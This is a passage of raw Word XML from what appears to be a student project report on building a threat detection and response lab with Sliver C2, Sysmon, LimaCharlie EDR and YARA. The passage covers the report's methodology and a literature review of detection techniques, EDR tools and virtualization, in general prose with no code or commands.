          <w:numId w:val="11"/>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Providing guidelines, best practices, and recommendations for replicating and extending the project's capabilities in different computing environments and scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>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Creating user guides, technical documentation, and tutorials to assist cybersecurity practitioners and organizations in deploying and leveraging the developed threat detection and response framework effectively.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1.5 Methodology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methodology employed in this project is designed to systematically develop, test, and evaluate the real-time threat detection and response framework. It encompasses several stages, each of which plays a crucial role in achieving the project objectives:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:num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1) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Setup and Configuration: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>This stage involves establishing the necessary infrastructure for conducting cyber attack simulations in a controlled environment. This includes setting up virtual machines using virtualization technologies such as VirtualBox or VMware to create a simulated cyber environment comprising attacker and victim systems. Furthermore, installing and configuring cybersecurity tools and frameworks, such as the Sliver C2 framework, Sysmon, LimaCharlie EDR, and YARA, to facilitate threat detection and response capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:num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2)  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Attack Simulation:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> The project conducts a series of cyber attack simulations within the simulated environment to generate relevant security events and telemetry data for analysis. This involves simulating various cyber attack scenarios, including lsass.exe memory dump attacks, ransomware attacks, phishing campaigns, and other common attack vectors. Scripted attack scenarios are executed using the Sliver C2 framework to emulate real-world cyber threats and adversary behavior.</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3)</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6"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Threat Detection: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>The project implements detection mechanisms using a combination of behavioral analysis, signature-based detection, and anomaly detection techniques to identify malicious activities within the simulated environment. Leveraging the capabilities of cybersecurity tools and frameworks, such as Sysmon, LimaCharlie EDR, and YARA, to monitor and analyze security events in real-time. Custom detection rules and algorithms are developed to correlate and analyze security telemetry data for indicators of compromise (IOCs) and suspicious behavior.</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4)</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6"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Threat Response: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>This stage involves developing response mechanisms to mitigate the impact of detected threats and prevent further exploitation of vulnerable systems. This includes implementing automated response actions, such as blocking malicious processes, isolating compromised systems, and alerting security personnel, to contain and neutralize cyber threats in real-time. Response capabilities are integrated with existing cybersecurity tools and frameworks to orchestrate coordinated incident response workflows and remediation actions.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5)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Evaluation and Validation:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> The project assesses the effectiveness and efficiency of the threat detection and response system through extensive testing and validation against known attack scenarios and benchmarks. This involves evaluating key performance metrics, including detection accuracy, false positive rates, response time, and overall efficacy in mitigating cyber threats. Validation tests are conducted in a controlled environment to verify the system's capabilities and resilience against various cyber attack vectors and scenarios.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32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="365F91"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Chapter 2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="365F91"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Literature Review</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2.1 Overview of Cyber Threat Detection and Response</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Cyber threat detection and response play pivotal roles in safeguarding digital assets and networks against a myriad of evolving cyber threats. Threat detection encompasses a multifaceted approach involving continuous monitoring, analysis, and correlation of various data sources to identify signs of potential security breaches or malicious activities. This proactive stance enables organizations to stay vigilant against emerging threats and swiftly respond to security incidents before they escalate into major breaches.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2.1.1 Detection Mechanisms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It is a process where behavioral analytics is combined with machine learning algorithms to identify abnormal behavior or suspicious activity inside a system or network to indicate a potential threat. Few of them are listed below:</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1) Signature-based detection: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Traditional method that identifies known threats by comparing patterns or signatures against a database of known malware signatures. While effective against known threats, it may fall short against novel or sophisticated attacks.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2) Anomaly detection: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Focuses on identifying deviations from normal patterns of behavior within network traffic, system logs, or user activity. Anomalies may indicate potential security incidents or unauthorized access attempts, prompting further investigation.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3) Behavioral analysis: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Utilizes machine learning algorithms to analyze historical data and user behavior to identify unusual or suspicious activities. By learning from past incidents, behavioral analysis can detect previously unseen threats or zero-day exploits.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4) Threat intelligence integration: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Incorporates external threat feeds, intelligence reports, and contextual information to enrich detection capabilities. By correlating security events with known indicators of compromise (IOCs), organizations can identify and prioritize potential threats more effectively.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2.1.2 Response Actions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>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i) Isolation of compromised systems:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Immediately isolating infected or compromised systems from the network to prevent further spread of the threat and minimize damage to other assets.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ii) Blocking malicious activities: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Employing firewall rules, intrusion prevention systems (IPS), or endpoint security solutions to block malicious network traffic, processes, or applications associated with the detected threat.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iii) Quarantine of infected files:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Moving suspicious files or executables to a quarantined environment for further analysis and containment to prevent them from causing harm to other systems or data.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iv) Alerting security personnel:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Notifying designated security teams or incident response personnel about the detected threat for further investigation, analysis, and remediation. Timely communication is essential for coordinating response efforts and minimizing the impact of the security incident.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2.1.3 Importance of Timely Response</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Timely and effective response actions are critical in mitigating the impact of security incidents and preventing further exploitation by threat actors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Delays in response can lead to prolonged exposure to threats, increased risk of data exfiltration or system compromise, and greater damage to organizational reputation and financial resources.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>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Automated response mechanisms and predefined incident response playbooks can help streamline response efforts, enabling organizations to respond rapidly to security incidents and minimize disruption to business operations.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2.2 EDR Tools in Cybersecurity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>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Endpoint Detection and Response (EDR) tools have emerged as indispensable assets in the cybersecurity arsenal of organizations, offering real-time visibility and control over endpoint devices within their network infrastructure. These endpoint devices encompass a wide array of endpoints, including desktops, laptops, servers, and mobile devices, each serving as potential entry points for cyber threats. EDR solutions are designed to monitor and safeguard these endpoints by continuously tracking and analyzing endpoint activities, thereby enabling organizations to detect, investigate, and respond to security incidents promptly and effectively.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Key Features of EDR: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Threat Detection:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">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EDR solutions leverage advanced analytics, machine learning algorithms, and threat intelligence feeds to detect indicators of compromise (IOCs) and suspicious activities on endpoint devices. By monitoring various endpoint events, such as process execution, file modifications, network connections, and user interactions, EDR tools can identify potential security threats, including malware infections, unauthorized access attempts, and anomalous behavior indicative of cyber attacks.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Investigation:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">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EDR tools provide security teams with detailed visibility into endpoint activities, allowing them to investigate security incidents and potential threats comprehensively. Security analysts can delve into historical endpoint data, examine event logs, and conduct forensic analysis to uncover the root cause of security incidents, trace the extent of compromise, and identify affected endpoints.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Response:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">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EDR solutions empower security teams to respond swiftly and decisively to security incidents by automating response actions, containing threats, and neutralizing malicious activities across the organization's endpoint environment. Response actions may include isolating compromised endpoints from the network, terminating malicious processes, quarantining infected files, and initiating remediation measures to restore the integrity of affected endpoints.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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Proactive Threat Hunting:</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One of the distinguishing features of EDR tools is their proactive threat hunting capabilities, which enable security teams to actively search for potential threats and vulnerabilities across the organization's endpoint environment. By leveraging advanced search queries, custom detection rules, and behavioral analytics, security analysts can proactively identify hidden threats, emerging attack patterns, and previously unseen indicators of compromise (IOCs), thereby enhancing the organization's cyber defense posture and resilience against cyber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Proactive threat hunting allows organizations to stay ahead of adversaries, identify potential security gaps or weaknesses in their endpoint security controls, and take preemptive measures to mitigate risks and strengthen their overall security posture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>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Integration and Collaboration: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EDR solutions often integrate seamlessly with other security technologies and platforms, such as Security Information and Event Management (SIEM) systems, threat intelligence feeds, and incident response platforms. This integration enables organizations to correlate endpoint telemetry data with network-wide security events, enriching threat intelligence and providing comprehensive visibility into security incidents and potential threats across the entire infrastructure.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Moreover, EDR solutions facilitate collaboration and information sharing among security teams, enabling them to coordinate response efforts, share insights, and collaborate on incident investigation and resolution. This collaborative approach enhances the effectiveness of incident response activities and fosters a culture of security awareness and collaboration within the organization.</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2.3 Techniques for Threat Detection and Response</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>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Various techniques are employed for threat detection and response in cybersecurity, each offering unique capabilities and advantages in identifying and mitigating cyber threats effectively. These techniques encompass a spectrum of approaches, from traditional signature-based detection to more advanced behavioral analysis and machine learning algorithms, enabling organizations to stay ahead of evolving cyber threats and enhance their cyber defense posture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>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2.3.1 Signature-Based Detection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Description: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Signature-based detection relies on predefined patterns or signatures to identify known threats, making it effective against previously identified malware and attack vectors.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Advantages: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Signature-based detection is well-suited for identifying known threats with high accuracy and minimal false positives, making it a reliable method for detecting known malware and malicious activities.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Limitations:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> However, signature-based detection is inherently limited in its ability to detect unknown and emerging threats, such as zero-day exploits and polymorphic malware, which do not match known signatures and can evade detection by traditional security measures.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2.3.2 Behavioral Analysis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Description: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Behavioral analysis focuses on identifying deviations from normal behavior patterns within network traffic, system logs, or user activity, allowing for the detection of unknown and emerging threats based on anomalous activities.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Advantages: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Behavioral analysis can detect previously unseen threats or zero-day exploits by identifying unusual or suspicious behavior indicative of potential security breaches, even in the absence of known signatures or patterns.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Limitations: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>However, behavioral analysis may generate false positives if legitimate activities are misconstrued as malicious behavior, requiring careful tuning and validation to minimize false alerts and ensure accurate threat detection.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2.3.3 Machine Learning Algorithms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Description:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Machine learning algorithms enhance threat detection capabilities by analyzing large volumes of data to identify patterns, trends, and correlations indicative of malicious behavior.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Advantages:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Machine learning algorithms can adapt and evolve over time, learning from past security incidents and refining their detection capabilities to detect subtle indicators of compromise and emerging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Limitations: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>However, machine learning algorithms require extensive training and validation using high-quality data to achieve optimal performance, and they may be susceptible to evasion techniques employed by sophisticated adversaries.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>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2.3.4 Threat Intelligence Integration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Description: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Threat intelligence integration enables organizations to leverage external threat feeds, intelligence reports, and contextual information to enhance their detection and response capabilities.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Advantages: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>By correlating security events with known indicators of compromise (IOCs) and contextual information, organizations can identify and prioritize potential threats more effectively, enabling faster and more accurate response actions.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Limitations: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>However, threat intelligence integration requires ongoing maintenance and validation to ensure the accuracy and relevance of threat intelligence sources, and it may introduce additional complexity and overhead in the detection and response workflow.</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2.4 Virtualization Technologies in Cybersecurity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>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Virtualization technologies play a pivotal role in modern cybersecurity by providing organizations with versatile tools for creating isolated, virtualized environments that facilitate various security-related activities, such as threat simulations, vulnerability assessments, and malware analysis. By leveraging virtualization, organizations can emulate diverse computing environments, including operating systems, networks, and applications, without the need for physical hardware, thereby reducing costs, complexity, and resource requirements.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2.4.1 Key Aspects of Virtualization in Cybersecurity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1. Testing and Development: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Virtualization enables cybersecurity professionals to create and manage virtualized environments for testing and developing security solutions, patches, and updates. By replicating target environments accurately, organizations can assess the effectiveness of security controls, evaluate new technologies, and validate security configurations in a safe and controlled manner.</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2. Threat Simulations: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Virtualization facilitates the creation of realistic and dynamic threat scenarios for simulating cyber attacks, including malware infections, network intrusions, and data breaches. By deploying virtualized environments with intentionally vulnerable configurations, organizations can assess their security posture, train security personnel, and evaluate incident response capabilities in a simulated but realistic setting.</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3. Malware Analysis:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Virtualization provides a secure and isolated environment for analyzing suspicious files, executables, and network traffic to identify malware, understand its behavior, and develop countermeasures. By running potentially malicious code in a virtualized sandbox environment, analysts can observe and analyze its actions without risking the integrity of production systems or compromising sensitive data.</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4. Honeypots and Deception Technologies: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Virtualization facilitates the deployment of honeypots, decoy systems, and deception technologies for luring and trapping attackers, gathering threat intelligence, and detecting unauthorized activities. By emulating realistic but fictitious systems and services, organizations can attract and monitor malicious actors, gather insights into attacker tactics and techniques, and strengthen their overall security posture.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5. Security Appliances and Tools: </w:t>
